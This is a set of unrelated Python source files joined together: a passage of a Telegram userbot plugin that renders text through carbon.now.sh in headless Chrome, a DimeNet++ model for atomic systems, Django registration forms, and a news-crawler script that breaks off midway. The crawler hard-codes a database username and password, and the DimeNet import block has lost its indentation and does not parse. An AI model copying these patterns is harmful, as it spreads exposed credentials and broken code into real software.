    await drg.edit("🔳🔳🔳🔳🔳")
    file = "./carbon.png"
    await drg.edit("☣️Karbon1 Completed, Uploading Karbon☣️")
    await event.client.send_file(
        event.chat_id,
        file,
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()  # bug fix: release the headless Chrome process
    await drg.delete()
@drgub.drg_cmd(
    pattern="kar2(?:\s|$)([\s\S]*)",
    command=("kar2", plugin_category),
    info={
        "header": "Carbon generators for given text (Fixed style)",
        "usage": [
            "{tr}kar2 <text>",
            "{tr}kar2 <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Fixed "one-light on red" preset: renders the given (or replied-to)
    text via carbon.now.sh and uploads the exported PNG.

    Fix vs. the original: the Chrome driver was never quit, leaking a
    headless Chrome process per invocation.
    """
    drg = await edit_or_reply(event, "📛📛📛📛📛")
    CARBON = "https://carbon.now.sh/?bg=rgba(239%2C40%2C44%2C1)&t=one-light&wt=none&l=application%2Ftypescript&ds=true&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Hack&fs=14px&lh=143%25&si=false&es=2x&wm=false&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[6:]:
        pcode = str(pcode[6:])  # inline text after the command
    elif textx:
        pcode = str(textx.message)  # replied-to message body
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    await drg.edit("🔘🔘📛📛📛")
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click Export; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await asyncio.sleep(1)
    await drg.edit("🔘🔘🔘📛📛")
    await asyncio.sleep(1)
    await drg.edit("🔘🔘🔘🔘🔘")
    file = "./carbon.png"
    await drg.edit("☣️Karbon2 Completed, Uploading Karbon☣️")
    await event.client.send_file(
        event.chat_id,
        file,
        caption=f"Here's your Karbon2",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()  # bug fix: release the headless Chrome process
    await drg.delete()
@drgub.drg_cmd(
    pattern="kar3(?:\s|$)([\s\S]*)",
    command=("kar3", plugin_category),
    info={
        "header": "Carbon generators for given text (Fixed style)",
        "usage": [
            "{tr}kar3 <text>",
            "{tr}kar3 <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Fixed "material on blue" preset: renders the given (or replied-to)
    text via carbon.now.sh and uploads the exported PNG.

    Fix vs. the original: the Chrome driver was never quit, leaking a
    headless Chrome process per invocation.
    """
    drg = await edit_or_reply(event, "🎛🎛🎛🎛🎛")
    CARBON = "https://carbon.now.sh/?bg=rgba(74%2C144%2C226%2C1)&t=material&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[6:]:
        pcode = str(pcode[6:])  # inline text after the command
    elif textx:
        pcode = str(textx.message)  # replied-to message body
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    await drg.edit("🔵🔵🎛🎛🎛")
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click Export; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await asyncio.sleep(1)
    await drg.edit("🔵🔵🔵🎛🎛")
    await asyncio.sleep(1)
    await drg.edit("🔵🔵🔵🔵🔵")
    file = "./carbon.png"
    await drg.edit("☣️Karbon3 Completed, Uploading Karbon⬆️")
    await event.client.send_file(
        event.chat_id,
        file,
        caption=f"Here's your Karbon3",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()  # bug fix: release the headless Chrome process
    await drg.delete()
@drgub.drg_cmd(
    pattern="kar4(?:\s|$)([\s\S]*)",
    command=("kar4", plugin_category),
    info={
        "header": "Carbon generators for given text (Fixed style)",
        "usage": [
            "{tr}kar4 <text>",
            "{tr}kar4 <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Fixed "one-light on navy" preset: renders the given (or replied-to)
    text via carbon.now.sh and uploads the exported PNG.

    Fix vs. the original: the Chrome driver was never quit, leaking a
    headless Chrome process per invocation.
    """
    drg = await edit_or_reply(event, "🌚🌚🌚🌚🌚")
    CARBON = "https://carbon.now.sh/?bg=rgba(29%2C40%2C104%2C1)&t=one-light&wt=none&l=application%2Ftypescript&ds=true&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Hack&fs=14px&lh=143%25&si=false&es=2x&wm=false&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[6:]:
        pcode = str(pcode[6:])  # inline text after the command
    elif textx:
        pcode = str(textx.message)  # replied-to message body
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    url = CARBON.format(code=code, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    await drg.edit("🌝🌝🌚🌚🌚")
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click Export; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await asyncio.sleep(1)
    await drg.edit("🌝🌝🌝🌚🌚")
    await asyncio.sleep(1)
    await drg.edit("🌝🌝🌝🌝🌝")
    file = "./carbon.png"
    await drg.edit("✅Karbon4 Completed, Uploading Karbon✅")
    await event.client.send_file(
        event.chat_id,
        file,
        caption=f"Here's your Karbon4 ",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()  # bug fix: release the headless Chrome process
    await drg.delete()
@drgub.drg_cmd(
    pattern="kargb(?:\s|$)([\s\S]*)",
    command=("kargb", plugin_category),
    info={
        "header": "Carbon generators for given text (random from some selected themes)",
        "usage": [
            "{tr}kargb <text>",
            "{tr}kargb <reply to text>",
        ],
    },
)
async def carbon_api(event):
    """A Wrapper for carbon.now.sh

    Renders the given (or replied-to) text with a random theme from the
    list below on a random RGB background.

    Fixes vs. the original:
    - RGB components were drawn with randint(0, 256), which includes the
      out-of-range value 256 (valid components are 0-255);
    - the theme was picked via randint + manual indexing instead of
      random.choice;
    - the Chrome driver was never quit, leaking a headless Chrome
      process per invocation.
    """
    # random.randint is inclusive on both ends, so 0..255 is the full range.
    RED = random.randint(0, 255)
    GREEN = random.randint(0, 255)
    BLUE = random.randint(0, 255)
    THEME = [
        "3024-night",
        "a11y-dark",
        "blackboard",
        "base16-dark",
        "base16-light",
        "cobalt",
        "dracula",
        "duotone-dark",
        "hopscotch",
        "lucario",
        "material",
        "monokai",
        "night-owl",
        "nord",
        "oceanic-next",
        "one-light",
        "one-dark",
        "panda-syntax",
        "paraiso-dark",
        "seti",
        "shades-of-purple",
        "solarized",
        "solarized%20light",
        "synthwave-84",
        "twilight",
        "verminal",
        "vscode",
        "yeti",
        "zenburn",
    ]
    The = random.choice(THEME)
    drg = await edit_or_reply(event, "⬜⬜⬜⬜⬜")
    CARBON = "https://carbon.now.sh/?bg=rgba({R}%2C{G}%2C{B}%2C1)&t={T}&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}"
    textx = await event.get_reply_message()
    pcode = event.text
    if pcode[7:]:
        pcode = str(pcode[7:])  # inline text after the command
    elif textx:
        pcode = str(textx.message)  # replied-to message body
    code = quote_plus(pcode)  # url-encode the snippet for the query string
    url = CARBON.format(code=code, R=RED, G=GREEN, B=BLUE, T=The, lang=CARBONLANG)
    # Headless Chrome setup; binary/driver paths come from the bot config.
    chrome_options = Options()
    chrome_options.add_argument("--headless")
    chrome_options.binary_location = Config.CHROME_BIN
    chrome_options.add_argument("--window-size=1920x1080")
    chrome_options.add_argument("--disable-dev-shm-usage")
    chrome_options.add_argument("--no-sandbox")
    chrome_options.add_argument("--disable-gpu")
    prefs = {"download.default_directory": "./"}
    chrome_options.add_experimental_option("prefs", prefs)
    await drg.edit("⬛⬛⬜⬜⬜")
    driver = webdriver.Chrome(
        executable_path=Config.CHROME_DRIVER, options=chrome_options
    )
    driver.get(url)
    download_path = "./"
    # Allow downloads in headless mode via the devtools protocol.
    driver.command_executor._commands["send_command"] = (
        "POST",
        "/session/$sessionId/chromium/send_command",
    )
    params = {
        "cmd": "Page.setDownloadBehavior",
        "params": {"behavior": "allow", "downloadPath": download_path},
    }
    driver.execute("send_command", params)
    # Click Export; the PNG lands in download_path.
    driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
    await asyncio.sleep(1)
    await drg.edit("⬛⬛⬛⬜⬜")
    await asyncio.sleep(1)
    await drg.edit("⬛⬛⬛⬛⬛")
    file = "./carbon.png"
    await drg.edit("✅RGB Karbon Completed, Uploading Karbon✅")
    await event.client.send_file(
        event.chat_id,
        file,
        caption=f"Here's your karbonrgb",
        force_document=True,
        reply_to=event.message.reply_to_msg_id,
    )
    os.remove("./carbon.png")  # clean up the downloaded image
    driver.quit()  # bug fix: release the headless Chrome process
    await drg.delete()
|
"""
Copyright (c) Facebook, Inc. and its affiliates.
This source code is licensed under the MIT license found in the
LICENSE file in the root directory of this source tree.
---
This code borrows heavily from the DimeNet implementation as part of
pytorch-geometric: https://github.com/rusty1s/pytorch_geometric. License:
---
Copyright (c) 2020 Matthias Fey <matthias.fey@tu-dortmund.de>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import torch
from torch import nn
from torch_geometric.nn import radius_graph
from torch_geometric.nn.acts import swish
from torch_geometric.nn.inits import glorot_orthogonal
from torch_geometric.nn.models.dimenet import (
BesselBasisLayer,
EmbeddingBlock,
Envelope,
ResidualLayer,
SphericalBasisLayer,
)
from torch_geometric.utils import degree
from torch_scatter import scatter
from torch_sparse import SparseTensor
from ocpmodels.common.registry import registry
from ocpmodels.common.utils import (
conditional_grad,
get_pbc_distances,
radius_graph_pbc,
)
#from ocpmodels.models.utils.pna import AGGREGATORS, SCALERS
try:
import sympy as sym
except ImportError:
sym = None
class InteractionPPBlock(torch.nn.Module):
    """DimeNet++ interaction block.

    Updates directed edge embeddings by combining each message x_ji with
    triplet messages x_kj that are modulated by radial (Bessel) and
    spherical basis projections, followed by residual refinement layers
    around a skip connection.
    """

    def __init__(
        self,
        hidden_channels,
        int_emb_size,
        basis_emb_size,
        num_spherical,
        num_radial,
        num_before_skip,
        num_after_skip,
        act=swish,
    ):
        super(InteractionPPBlock, self).__init__()
        self.act = act
        # Transformations of Bessel and spherical basis representations.
        self.lin_rbf1 = nn.Linear(num_radial, basis_emb_size, bias=False)
        self.lin_rbf2 = nn.Linear(basis_emb_size, hidden_channels, bias=False)
        self.lin_sbf1 = nn.Linear(
            num_spherical * num_radial, basis_emb_size, bias=False
        )
        self.lin_sbf2 = nn.Linear(basis_emb_size, int_emb_size, bias=False)
        # Dense transformations of input messages.
        self.lin_kj = nn.Linear(hidden_channels, hidden_channels)
        self.lin_ji = nn.Linear(hidden_channels, hidden_channels)
        # Embedding projections for interaction triplets: down-project to the
        # cheaper int_emb_size for triplet aggregation, back up afterwards.
        self.lin_down = nn.Linear(hidden_channels, int_emb_size, bias=False)
        self.lin_up = nn.Linear(int_emb_size, hidden_channels, bias=False)
        # Residual layers before and after skip connection.
        self.layers_before_skip = torch.nn.ModuleList(
            [
                ResidualLayer(hidden_channels, act)
                for _ in range(num_before_skip)
            ]
        )
        self.lin = nn.Linear(hidden_channels, hidden_channels)
        self.layers_after_skip = torch.nn.ModuleList(
            [
                ResidualLayer(hidden_channels, act)
                for _ in range(num_after_skip)
            ]
        )
        self.reset_parameters()

    def reset_parameters(self):
        """Re-initialize weights (glorot-orthogonal) and zero all biases.

        NOTE: the call order determines the RNG stream, so it must not be
        reordered if reproducibility with existing checkpoints matters.
        """
        glorot_orthogonal(self.lin_rbf1.weight, scale=2.0)
        glorot_orthogonal(self.lin_rbf2.weight, scale=2.0)
        glorot_orthogonal(self.lin_sbf1.weight, scale=2.0)
        glorot_orthogonal(self.lin_sbf2.weight, scale=2.0)
        glorot_orthogonal(self.lin_kj.weight, scale=2.0)
        self.lin_kj.bias.data.fill_(0)
        glorot_orthogonal(self.lin_ji.weight, scale=2.0)
        self.lin_ji.bias.data.fill_(0)
        glorot_orthogonal(self.lin_down.weight, scale=2.0)
        glorot_orthogonal(self.lin_up.weight, scale=2.0)
        for res_layer in self.layers_before_skip:
            res_layer.reset_parameters()
        glorot_orthogonal(self.lin.weight, scale=2.0)
        self.lin.bias.data.fill_(0)
        for res_layer in self.layers_after_skip:
            res_layer.reset_parameters()

    def forward(self, x, rbf, sbf, idx_kj, idx_ji):
        """Return updated edge embeddings.

        x: per-edge messages (x.size(0) edges); rbf/sbf: radial and
        spherical basis values; idx_kj/idx_ji: edge indices of each
        triplet (k->j, j->i).
        """
        # Initial transformations.
        x_ji = self.act(self.lin_ji(x))
        x_kj = self.act(self.lin_kj(x))
        # Transformation via Bessel basis.
        rbf = self.lin_rbf1(rbf)
        rbf = self.lin_rbf2(rbf)
        x_kj = x_kj * rbf
        # Down-project embeddings and generate interaction triplet embeddings.
        x_kj = self.act(self.lin_down(x_kj))
        # Transform via 2D spherical basis.
        sbf = self.lin_sbf1(sbf)
        sbf = self.lin_sbf2(sbf)
        x_kj = x_kj[idx_kj] * sbf
        # Aggregate interactions and up-project embeddings.
        x_kj = scatter(x_kj, idx_ji, dim=0, dim_size=x.size(0))
        x_kj = self.act(self.lin_up(x_kj))
        # Skip connection with residual refinement on both sides.
        h = x_ji + x_kj
        for layer in self.layers_before_skip:
            h = layer(h)
        h = self.act(self.lin(h)) + x
        for layer in self.layers_after_skip:
            h = layer(h)
        return h
class OutputPPBlock(torch.nn.Module):
    """DimeNet++ output block.

    Gates edge messages by the radial basis, aggregates them per target
    atom, and projects the result to `out_channels` values per atom.
    When both `aggregators` and `scalers` are given, PNA-style
    multi-aggregation is used instead of the plain sum.
    """

    def __init__(
        self,
        num_radial,
        hidden_channels,
        out_emb_channels,
        out_channels,
        num_layers,
        act,
        aggregators,
        scalers,
    ):
        super(OutputPPBlock, self).__init__()
        self.act = act
        self.pna = False
        if aggregators and scalers:
            # NOTE(review): AGGREGATORS/SCALERS come from the pna import that
            # is commented out at the top of this file, so enabling this path
            # as-is raises NameError — restore that import before use.
            self.pna = True
            self.aggregators = [AGGREGATORS[aggr] for aggr in aggregators]
            self.scalers = [SCALERS[scale] for scale in scalers]
            # average degree computed from data
            self.avg_deg = {"lin": 33.53, "log": 3.47}
            self.aggr_down = nn.Linear(
                len(aggregators) * len(scalers) * hidden_channels,
                out_emb_channels,
                bias=True,
            )
        else:
            self.lin_up = nn.Linear(
                hidden_channels, out_emb_channels, bias=True
            )
        self.lin_rbf = nn.Linear(num_radial, hidden_channels, bias=False)
        self.lins = torch.nn.ModuleList()
        for _ in range(num_layers):
            self.lins.append(nn.Linear(out_emb_channels, out_emb_channels))
        self.lin = nn.Linear(out_emb_channels, out_channels, bias=False)
        self.reset_parameters()

    def reset_parameters(self):
        """Glorot-orthogonal init for projections; the final layer starts at zero."""
        glorot_orthogonal(self.lin_rbf.weight, scale=2.0)
        if not self.pna:
            glorot_orthogonal(self.lin_up.weight, scale=2.0)
        for lin in self.lins:
            glorot_orthogonal(lin.weight, scale=2.0)
            lin.bias.data.fill_(0)
        # Zero final weights so the block initially contributes nothing.
        self.lin.weight.data.fill_(0)

    def forward(self, x, rbf, i, num_nodes=None):
        """Aggregate edge messages `x` onto target atoms `i` and project.

        i: target-atom index per edge; num_nodes: number of atoms in the batch.
        """
        x = self.lin_rbf(rbf) * x  # gate messages by the radial basis
        if self.pna:
            # PNA: concatenate several aggregations, then degree-scale them.
            outs = [
                aggr(x, i, dim_size=num_nodes) for aggr in self.aggregators
            ]
            out = torch.cat(outs, dim=-1)
            deg = degree(i, num_nodes, dtype=x.dtype).view(-1, 1)
            outs = [scaler(out, deg, self.avg_deg) for scaler in self.scalers]
            x = torch.cat(outs, dim=-1)
            x = self.aggr_down(x)
        else:
            # Plain sum-aggregation per atom.
            x = scatter(x, i, dim=0, dim_size=num_nodes)
            x = self.lin_up(x)
        for lin in self.lins:
            x = self.act(lin(x))
        return self.lin(x)
class DimeNetPlusPlus(torch.nn.Module):
    r"""DimeNet++ implementation based on https://github.com/klicperajo/dimenet.
    Args:
        hidden_channels (int): Hidden embedding size.
        out_channels (int): Size of each output sample.
        num_blocks (int): Number of building blocks.
        int_emb_size (int): Embedding size used for interaction triplets
        basis_emb_size (int): Embedding size used in the basis transformation
        out_emb_channels(int): Embedding size used for atoms in the output block
        num_spherical (int): Number of spherical harmonics.
        num_radial (int): Number of radial basis functions.
        cutoff: (float, optional): Cutoff distance for interatomic
            interactions. (default: :obj:`5.0`)
        envelope_exponent (int, optional): Shape of the smooth cutoff.
            (default: :obj:`5`)
        num_before_skip: (int, optional): Number of residual layers in the
            interaction blocks before the skip connection. (default: :obj:`1`)
        num_after_skip: (int, optional): Number of residual layers in the
            interaction blocks after the skip connection. (default: :obj:`2`)
        num_output_layers: (int, optional): Number of linear layers for the
            output blocks. (default: :obj:`3`)
        act: (function, optional): The activation funtion.
            (default: :obj:`swish`)
    """

    # Upstream location of reference pretrained weights (appears unused here).
    url = "https://github.com/klicperajo/dimenet/raw/master/pretrained"

    def __init__(
        self,
        hidden_channels,
        out_channels,
        num_blocks,
        int_emb_size,
        basis_emb_size,
        out_emb_channels,
        num_spherical,
        num_radial,
        cutoff=5.0,
        envelope_exponent=5,
        num_before_skip=1,
        num_after_skip=2,
        num_output_layers=3,
        act=swish,
        aggregators=None,
        scalers=None,
    ):
        super(DimeNetPlusPlus, self).__init__()
        self.cutoff = cutoff
        # The spherical basis layer needs sympy to build its basis functions.
        if sym is None:
            raise ImportError("Package `sympy` could not be found.")
        self.num_blocks = num_blocks
        # Radial (Bessel) and spherical basis expansions of edge geometry.
        self.rbf = BesselBasisLayer(num_radial, cutoff, envelope_exponent)
        self.sbf = SphericalBasisLayer(
            num_spherical, num_radial, cutoff, envelope_exponent
        )
        self.emb = EmbeddingBlock(num_radial, hidden_channels, act)
        # One output block per interaction block plus one for the embedding.
        self.output_blocks = torch.nn.ModuleList(
            [
                OutputPPBlock(
                    num_radial,
                    hidden_channels,
                    out_emb_channels,
                    out_channels,
                    num_output_layers,
                    act,
                    aggregators,
                    scalers,
                )
                for _ in range(num_blocks + 1)
            ]
        )
        self.interaction_blocks = torch.nn.ModuleList(
            [
                InteractionPPBlock(
                    hidden_channels,
                    int_emb_size,
                    basis_emb_size,
                    num_spherical,
                    num_radial,
                    num_before_skip,
                    num_after_skip,
                    act,
                )
                for _ in range(num_blocks)
            ]
        )
        self.reset_parameters()

    def reset_parameters(self):
        """Re-initialize the basis, embedding, output, and interaction blocks."""
        self.rbf.reset_parameters()
        self.emb.reset_parameters()
        for out in self.output_blocks:
            out.reset_parameters()
        for interaction in self.interaction_blocks:
            interaction.reset_parameters()

    def triplets(self, edge_index, num_nodes):
        """Enumerate all directed triplets k->j->i from the edge list.

        Returns (col, row, idx_i, idx_j, idx_k, idx_kj, idx_ji), where
        idx_kj / idx_ji are the edge indices forming each triplet.
        """
        row, col = edge_index  # j->i
        # Give each edge a unique id so triplet edges can be recovered.
        value = torch.arange(row.size(0), device=row.device)
        adj_t = SparseTensor(
            row=col, col=row, value=value, sparse_sizes=(num_nodes, num_nodes)
        )
        adj_t_row = adj_t[row]
        num_triplets = adj_t_row.set_value(None).sum(dim=1).to(torch.long)
        # Node indices (k->j->i) for triplets.
        idx_i = col.repeat_interleave(num_triplets)
        idx_j = row.repeat_interleave(num_triplets)
        idx_k = adj_t_row.storage.col()
        mask = idx_i != idx_k  # Remove i == k triplets.
        idx_i, idx_j, idx_k = idx_i[mask], idx_j[mask], idx_k[mask]
        # Edge indices (k-j, j->i) for triplets.
        idx_kj = adj_t_row.storage.value()[mask]
        idx_ji = adj_t_row.storage.row()[mask]
        return col, row, idx_i, idx_j, idx_k, idx_kj, idx_ji

    def forward(self, z, pos, batch=None):
        """Abstract forward pass; implemented by subclasses (e.g. the wrapper)."""
        raise NotImplementedError
@registry.register_model("dimenetplusplus")
class DimeNetPlusPlusWrap(DimeNetPlusPlus):
    """OCP wrapper around DimeNet++ supporting PBC graphs, force regression
    via autograd, and optional per-atom position regression."""

    def __init__(
        self,
        num_atoms,
        bond_feat_dim,  # not used
        num_targets,
        use_pbc=True,
        regress_forces=True,
        regress_position=False,
        hidden_channels=128,
        num_blocks=4,
        int_emb_size=64,
        basis_emb_size=8,
        out_emb_channels=256,
        num_spherical=7,
        num_radial=6,
        otf_graph=False,
        cutoff=10.0,
        envelope_exponent=5,
        num_before_skip=1,
        num_after_skip=2,
        num_output_layers=3,
        aggregators=None,
        scalers=None,
    ):
        self.regress_position = regress_position
        # Position regression predicts a 3-vector per atom regardless of
        # the requested number of targets.
        if self.regress_position:
            self.num_targets = 3
        else:
            self.num_targets = num_targets
        self.regress_forces = regress_forces
        self.use_pbc = use_pbc
        self.cutoff = cutoff
        self.otf_graph = otf_graph
        super(DimeNetPlusPlusWrap, self).__init__(
            hidden_channels=hidden_channels,
            out_channels=self.num_targets,
            num_blocks=num_blocks,
            int_emb_size=int_emb_size,
            basis_emb_size=basis_emb_size,
            out_emb_channels=out_emb_channels,
            num_spherical=num_spherical,
            num_radial=num_radial,
            cutoff=cutoff,
            envelope_exponent=envelope_exponent,
            num_before_skip=num_before_skip,
            num_after_skip=num_after_skip,
            num_output_layers=num_output_layers,
            aggregators=aggregators,
            scalers=scalers,
        )

    @conditional_grad(torch.enable_grad())
    def _forward(self, data):
        """Compute per-atom outputs P and per-graph energies for `data`."""
        pos = data.pos
        batch = data.batch
        # Optionally (re)build the radius graph on the fly, honoring PBC.
        if self.otf_graph:
            edge_index, cell_offsets, neighbors = radius_graph_pbc(
                data, self.cutoff, 50, data.pos.device
            )
            data.edge_index = edge_index
            data.cell_offsets = cell_offsets
            data.neighbors = neighbors
        if self.use_pbc:
            # Distances account for periodic cell offsets.
            out = get_pbc_distances(
                pos,
                data.edge_index,
                data.cell,
                data.cell_offsets,
                data.neighbors,
                return_offsets=True,
            )
            edge_index = out["edge_index"]
            dist = out["distances"]
            offsets = out["offsets"]
            j, i = edge_index
        else:
            edge_index = radius_graph(pos, r=self.cutoff, batch=batch)
            j, i = edge_index
            dist = (pos[i] - pos[j]).pow(2).sum(dim=-1).sqrt()
        _, _, idx_i, idx_j, idx_k, idx_kj, idx_ji = self.triplets(
            edge_index, num_nodes=data.atomic_numbers.size(0)
        )
        # Calculate angles.
        pos_i = pos[idx_i].detach()
        pos_j = pos[idx_j].detach()
        if self.use_pbc:
            # Apply the periodic offsets of each triplet edge.
            pos_ji, pos_kj = (
                pos[idx_j].detach() - pos_i + offsets[idx_ji],
                pos[idx_k].detach() - pos_j + offsets[idx_kj],
            )
        else:
            pos_ji, pos_kj = (
                pos[idx_j].detach() - pos_i,
                pos[idx_k].detach() - pos_j,
            )
        # atan2 of (|cross|, dot) gives the angle between the edge vectors.
        a = (pos_ji * pos_kj).sum(dim=-1)
        b = torch.cross(pos_ji, pos_kj).norm(dim=-1)
        angle = torch.atan2(b, a)
        rbf = self.rbf(dist)
        sbf = self.sbf(dist, angle, idx_kj)
        # Embedding block.
        x = self.emb(data.atomic_numbers.long(), rbf, i, j)
        P = self.output_blocks[0](x, rbf, i, num_nodes=pos.size(0))
        # Interaction blocks: each refines x and adds its output to P.
        for interaction_block, output_block in zip(
            self.interaction_blocks, self.output_blocks[1:]
        ):
            x = interaction_block(x, rbf, sbf, idx_kj, idx_ji)
            P += output_block(x, rbf, i, num_nodes=pos.size(0))
        # Per-graph energy: sum of per-atom contributions within each graph.
        energy = (
            P.sum(dim=0)
            if data.batch is None
            else scatter(P, data.batch, dim=0)
        )
        return P, energy

    def forward(self, data):
        """Return (energy, forces), per-atom P, or energy, depending on flags.

        NOTE(review): when both regress_forces and regress_position are set,
        the forces branch wins — confirm this precedence is intended.
        """
        if self.regress_forces:
            data.pos.requires_grad_(True)
        P, energy = self._forward(data)
        if self.regress_forces:
            # Forces are the negative gradient of the energy w.r.t. positions.
            forces = -1 * (
                torch.autograd.grad(
                    energy,
                    data.pos,
                    grad_outputs=torch.ones_like(energy),
                    create_graph=True,
                )[0]
            )
            return energy, forces
        elif self.regress_position:
            return P
        else:
            return energy

    @property
    def num_params(self):
        # Total number of trainable and non-trainable parameters.
        return sum(p.numel() for p in self.parameters())
|
# Forms for user registration: account credentials plus the profile picture.
from django import forms
from django.contrib.auth.models import User
from core.models import UserProfile
class UserForm(forms.ModelForm):
    """Registration form for Django's built-in ``User`` model.

    Adds an explicit password field rendered with a password widget so the
    value is masked in the browser.
    """
    # NOTE(review): the consuming view is expected to hash this value
    # (e.g. via ``user.set_password``) before saving -- a plain
    # ``ModelForm.save()`` would store it in clear text.
    password = forms.CharField(widget=forms.PasswordInput())

    class Meta:
        model = User
        fields = ('username', 'email', 'password',)
class UserProfileForm(forms.ModelForm):
    """Companion form for the user's profile; currently only the picture."""

    class Meta:
        model = UserProfile
        fields = ('profile_pic',)
|
#!/usr/bin/python3
__version__ = 3
__all__ = ['event_download_netease_news', 'event_record_announce_url', ]
def event_download_netease_news():
    """Crawl Netease financial news: harvest article URLs, then download and
    store each article through the spider's MySQL-backed recorder."""
    from libmysql_utils.mysql8 import mysqlHeader
    from dev_global.env import SOFT_PATH
    from taurus.news_downloader import neteaseNewsSpider
    # NOTE(review): database credentials are hard-coded; consider moving
    # them to configuration.
    header = mysqlHeader('stock', 'stock2020', 'natural_language')
    event = neteaseNewsSpider(header, SOFT_PATH)
    # Phase 1: build index-page list and collect article hrefs from each.
    event.generate_url_list()
    for url in event.url_list:
        event.extract_href(url)
    event.save_process()
    # hfile = SOFT_PATH + 'config/HREF_LIST'
    # event.load_href_file(hfile)
    # Phase 2: download each collected article and persist it.
    for url in event.href:
        art = event.extract_article(url)
        event.record_article(art)
def event_record_announce_url():
    """Record cninfo announcement URLs for every stock in the database."""
    from polaris.mysql8 import mysqlHeader, GLOBAL_HEADER
    from venus.stock_base import StockEventBase
    from taurus.announcement import cninfoAnnounce
